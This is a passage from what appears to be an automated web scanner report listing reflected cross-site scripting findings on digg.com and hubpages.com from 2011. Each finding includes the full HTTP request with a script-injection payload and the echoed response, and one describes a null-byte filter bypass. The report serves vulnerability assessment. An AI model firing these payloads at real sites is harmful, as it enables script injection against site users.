<link rel="alternate" type="application/rss+xml" title="Digg" href="/remote-submit%0074e09"><ScRiPt>alert(1)</ScRiPt>996a87db1cb.rss">
...[SNIP]...

1.74. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00cf201"><script>alert(1)</script>56f50e4da51 was submitted in the REST URL parameter 1. This input was echoed as cf201"><script>alert(1)</script>56f50e4da51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /submit%00cf201"><script>alert(1)</script>56f50e4da51 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 21:08:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1458898097449992448%3A180; expires=Sat, 12-Feb-2011 21:08:08 GMT; path=/; domain=digg.com
Set-Cookie: d=7790e3bcd773131188588be60902b297e1566c5c2d8e4567c363f32a95040d0e; expires=Thu, 11-Feb-2021 07:15:48 GMT; path=/; domain=.digg.com
X-Digg-Time: D=220052 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15613

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00cf201"><script>alert(1)</script>56f50e4da51.rss">
...[SNIP]...

1.75. http://hubpages.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 548f8"><script>alert(1)</script>9a7d90ba46e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?548f8"><script>alert(1)</script>9a7d90ba46e=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:15:39 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 29252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/?548f8"><script>alert(1)</script>9a7d90ba46e=1', 'HubPages'); return false;">
...[SNIP]...

1.76. http://hubpages.com/about/advertise [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /about/advertise

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23253"><script>alert(1)</script>b500e541fe8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about23253"><script>alert(1)</script>b500e541fe8/advertise HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:17:56 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/about23253"><script>alert(1)</script>b500e541fe8/advertise', 'Page not found'); return false;">
...[SNIP]...

1.77. http://hubpages.com/about/advertise [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /about/advertise

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40c6c"><script>alert(1)</script>7545254ff79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/advertise?40c6c"><script>alert(1)</script>7545254ff79=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:53 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 9876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/about/advertise?40c6c"><script>alert(1)</script>7545254ff79=1', 'Advertise on HubPages'); return false;">
...[SNIP]...

1.78. http://hubpages.com/hubs/hot/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /hubs/hot/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad8bd"><script>alert(1)</script>8ae6a13056a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad8bd"><script>alert(1)</script>8ae6a13056a/hot/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:16:40 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/ad8bd"><script>alert(1)</script>8ae6a13056a/hot/', 'Page not found'); return false;">
...[SNIP]...

1.79. http://hubpages.com/hubs/hot/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /hubs/hot/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cd29"><script>alert(1)</script>a7b16cce6e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hubs/hot/?9cd29"><script>alert(1)</script>a7b16cce6e7=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:16:39 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 19071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Hot Hubs" href="http://hubpages.com/hubs/hot/?9cd29"><script>alert(1)</script>a7b16cce6e7=1&amp;rss" />
...[SNIP]...

1.80. http://hubpages.com/my/hubs/stats [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /my/hubs/stats

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42fda"><script>alert(1)</script>dcab9466b78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my42fda"><script>alert(1)</script>dcab9466b78/hubs/stats HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:20:08 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/my42fda"><script>alert(1)</script>dcab9466b78/hubs/stats', 'Page not found'); return false;">
...[SNIP]...

1.81. http://hubpages.com/my/hubs/stats [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /my/hubs/stats

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bf69"><script>alert(1)</script>92d7c54b2f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my/hubs1bf69"><script>alert(1)</script>92d7c54b2f9/stats HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:20:18 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/my/hubs1bf69"><script>alert(1)</script>92d7c54b2f9/stats', 'Page not found'); return false;">
...[SNIP]...

1.82. http://hubpages.com/my/hubs/stats [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /my/hubs/stats

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 277b5"><script>alert(1)</script>f325d2bc4d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my/hubs/stats277b5"><script>alert(1)</script>f325d2bc4d8 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:20:28 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/my/hubs/stats277b5"><script>alert(1)</script>f325d2bc4d8', 'Page not found'); return false;">
...[SNIP]...

1.83. http://hubpages.com/signin/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /signin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b32d"><script>alert(1)</script>e576f82391c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /8b32d"><script>alert(1)</script>e576f82391c/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings. HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:16:38 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/8b32d"><script>alert(1)</script>e576f82391c/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.', 'Page not found'); return false;">
...[SNIP]...

1.84. http://hubpages.com/topics/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /topics/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99f48"><script>alert(1)</script>a4d9d607aff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topics99f48"><script>alert(1)</script>a4d9d607aff/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:16:38 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/topics99f48"><script>alert(1)</script>a4d9d607aff/', 'Page not found'); return false;">
...[SNIP]...

1.85. http://hubpages.com/topics/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /topics/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27fdc"><script>alert(1)</script>33eb76fcea0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topics/?27fdc"><script>alert(1)</script>33eb76fcea0=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:16:36 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 66444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/topics/?27fdc"><script>alert(1)</script>33eb76fcea0=1', 'Popular Topics on HubPages'); return false;">
...[SNIP]...

1.86. http://hubpages.com/tour/affiliate [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /tour/affiliate

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a6d1"><script>alert(1)</script>cc37e02719e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tour4a6d1"><script>alert(1)</script>cc37e02719e/affiliate HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:17:56 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/tour4a6d1"><script>alert(1)</script>cc37e02719e/affiliate', 'Page not found'); return false;">
...[SNIP]...

1.87. http://hubpages.com/tour/affiliate [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /tour/affiliate

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c6a5"><script>alert(1)</script>b63f5c1a6bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tour/affiliate2c6a5"><script>alert(1)</script>b63f5c1a6bd HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:58 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/tour/affiliate2c6a5"><script>alert(1)</script>b63f5c1a6bd', 'HubPages Tour: not found'); return false;">
...[SNIP]...

1.88. http://hubpages.com/tour/affiliate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /tour/affiliate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1afa9"><script>alert(1)</script>d4f4f14b999 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tour/affiliate?1afa9"><script>alert(1)</script>d4f4f14b999=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:53 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 11829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/tour/affiliate?1afa9"><script>alert(1)</script>d4f4f14b999=1', 'HubPages Affiliate Tour'); return false;">
...[SNIP]...

1.89. http://hubpages.com/user/new/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /user/new/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f280"><script>alert(1)</script>1667bd96a88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user8f280"><script>alert(1)</script>1667bd96a88/new/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
